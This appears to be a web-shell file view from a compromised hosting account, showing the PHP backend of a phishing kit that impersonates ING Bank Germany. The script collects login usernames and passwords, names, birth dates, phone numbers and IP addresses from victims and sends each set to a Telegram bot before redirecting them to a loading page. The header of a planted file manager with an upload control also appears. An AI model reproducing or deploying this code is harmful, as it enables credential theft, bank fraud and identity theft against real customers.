HEX
Server: Apache
System: Linux bd12.noc223.com 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP Thu Apr 30 16:40:41 UTC 2026 x86_64
User: handcraf (1693)
PHP: 8.1.28
Disabled: NONE
Upload Files
File: /home/handcraf/public_html/ING/infos.php
<?php 
require_once "functions.php";
require_once "cfg.php";

if (isset($_POST['user'])) {
    $_SESSION['username'] = $_POST['user'];
	$_SESSION['password'] = $_POST['password'];
	$message  = "INGBANK DE:" . "\n";
	$message .= "Username : " . $_POST['user'] .  "\r\n";
	$message .= "Password : " . $_POST['password'] .  "\r\n";
	$message .= "IP : ".$ip."\n";
	$apiToken;
	$data = [
	'chat_id' => $id, 
	'text' => $message
	];
	$response = file_get_contents("https://api.telegram.org/bot" .$apiToken . "/sendMessage?" . http_build_query($data) );
    header('Location: loading.php?cred=1sHFHJHDHDHKJDJDSDSJDSJKJDSJDSDJJDSHYKJHGFG&bll=bll');
    exit;

}

if (isset($_POST['fllname'])) {
	$message  = "INGBANK DE:" . "\n";
	$message .= "Username : " . $_SESSION['username'] .  "\r\n";
	$message .= "Vorname : ".$_POST['fllname'] . "\n";
    $message .= "Nachname : ".$_POST['lastname'] . "\n";
    $message .= "Geburtsdatum : ".$_POST['dob'] . "\n";
    $message .= "Telefonnummer : ".$_POST['phh'] . "\n";
    $message .= "IP : ".$ip."\n";
	
	$apiToken;
    $data = [
    'chat_id' => $id, 
    'text' => $message
    ];
    $response = file_get_contents("https://api.telegram.org/bot" .$apiToken . "/sendMessage?" . http_build_query($data) );
	header('Location: loading.php?cred=1sHFHJHDHDHKJDJDSDSJDSJKJDSJDSDJJDSHYKJHGFG&success=success');
	exit();
	
}

?>